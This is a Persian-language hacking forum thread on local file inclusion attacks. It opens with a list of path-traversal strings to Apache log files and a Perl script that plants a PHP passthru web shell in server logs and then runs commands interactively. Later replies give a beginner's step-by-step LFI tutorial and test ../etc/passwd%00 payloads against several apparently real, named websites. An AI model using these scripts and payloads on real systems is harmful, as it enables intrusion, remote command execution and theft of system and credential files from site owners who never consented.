SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

LFI Log Injector

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • LFI Log Injector

    [align=LEFT]
    [php]



    ./apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log
    Code
    #!/usr/bin/perl -w
    use IO::Socket;
    use LWP::UserAgent;
    $site=”www.vulnerablesite.com”;
    $path=”/”;
    $code=”<? Passthru(\$_GET[cmd]) ?>”;
    $log = “../../../../../../../etc/httpd/logs/error_log”;
    print “Trying to inject the code”;
    $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die
    “\nConnection Failed.\n\n”;
    print $socket “GET “.$path.$code.” HTTP/1.1\r\n”;
    print $socket “User-Agent: “.$code.”\r\n”;
    print $socket “Host: “.$site.”\r\n”;
    print $socket “Connection: close\r\n\r\n”;
    close($socket);
    print “\nCode $code successfully injected in $log \n”;
    print “\nType command to run or exit to end: “;
    $cmd = <STDIN>;
    while($cmd !~ “exit”) {
    $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die
    “\nConnection Failed.\n\n”;
    print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$ cmd HTTP/1.1\r\n”;
    print $socket “Host: “.$site.”\r\n”;
    print $socket “Accept: */*\r\n”;
    print $socket “Connection: close\r\n\n”;
    while ($show = <$socket>)
    {
    print $show;
    }
    print “Type command to run or exit to end: “;




    [/php][/align]
    [align=center][/align]

  • #2
    RE: LFI Log Injector

    با سلام من با این باگ آشنام و میدونم چه جوری باگ رو اجرا کینم اما نمیدونم به من چی میده یعنی لیستی از پسورد ها میده اما چه بدرد میخوره؟

    نظر


    • #3
      RE: LFI Log Injector

      لیست ادرس یوز ها و روت رو میده شما میتوانید فایل کانفیگ سایتها ، لاگ ها رو بخونی

      اگر هم موفق به خوندن proc/self/environ بشی امکان شل گیری هم برات فراهم میشه .
      [align=center][/align]

      نظر


      • #4
        RE: LFI Log Injector

        سلام حسین جان.
        آقا این کدها به این شکل در آمدن.درستش که بی زحمت:

        print $socket “Host: “.$site.”\r\n”;

        نظر


        • #5
          RE: LFI Log Injector

          این خطا میده .یعنی چی ؟

          http://prestoncustomknives.com/index.php?BODY=../etc/passwd%00
          چو ایران نباشد تن من مباد

          نظر


          • #6
            RE: LFI Log Injector

            مسیر رو تا جایی که passwd برای شما بیاد ادامه بدید مثلا

            http://prestoncustomknives.com/index.php?BODY=../../../../etc/passwd
            [align=center][/align]

            نظر


            • #7
              RE: LFI Log Injector

              http://www.powerfreezzz.com/Home.php?body=../../../../../../../../../../etc/passwd%00

              این الان پچ شده ؟
              چو ایران نباشد تن من مباد

              نظر


              • #8
                RE: LFI Log Injector

                خوب الان اگه یه سایتی اطلاعات رو داد ،باید این اطلاعات رو چی کارش کرد؟
                [hr]
                این رو نوشتم راحت باشید .
                واسه تازه وارد ها البته

                [align=RIGHT]اول وارد سایت شده و لینک های ان را تست میکنیم تا ببینیم ایا از متغییر خاصی تبعیت میکند یا خیر[/align] [align=RIGHT]لینکهای سایت را تست میکنیم[/align]
                www.site.com/index.php?body=news

                www.site.com/index.php?body=payam

                www.site.com/index.php?body=man

                www.site.com/index.php?body=dl
                [align=RIGHT]در این تارگت از متغیر body


                استفاده میشود.حال برای تست اسیب پذیری مقدار body=


                که بعد از مساوی نوشته شده را پاک کرده و مقدار زیر را به ان اضافه میکنیم .[/align]
                [align=LEFT]../etc/passwd%00[/align] [align=RIGHT]در برخی سایت ها احتیاجی به %00 نمیباشد.چون شاید توسط مدیر پچ شده باشه .واسه همین هر دو حالت رو تست کنید[/align]
                [align=RIGHT]این عمل را با اضافه کردن

                /..

                ادامه میدهیم تا به خطایی برنخوریم .[/align] [align=RIGHT]مثال[/align] [align=RIGHT]http://www.jpistudios.com/redirect.p.../etc/passwd%00[/align] [align=RIGHT]این مراحل تا جایی ادامه میدهیم تا دایرکتوری کامل سایت سرور نشون داده بشه[/align] [align=RIGHT]http://www.powerfreezzz.com/Home.php?body=../../../../../../../../../../etc/passwd[/align] [align=RIGHT]بعد با تغیر دستور در اخر ان میتوانیم مشخصات دیگر سرور را بیرون بکشیم[/align] [align=RIGHT] [/align]حالا علاوه بر دستور etc/passwd از دو دوستور زیر هم برای ادامه و بیرون کشیدن اطلاعات استفاده میکنیم

                [align=RIGHT]etc/hosts%00[/align][align=RIGHT]و با دستور زیر [/align] [align=RIGHT]Etc/NAMED.CONF%00[/align] [align=RIGHT] [/align]


                [align=RIGHT] [/align] [align=RIGHT]By ms-aris[/align] اگه خوب نوشتم یه نظری بدید تا واسه همه باگها یه توضیح بزارم
                [align=RIGHT] [/align]
                چو ایران نباشد تن من مباد

                نظر

                صبر کنید ..
                X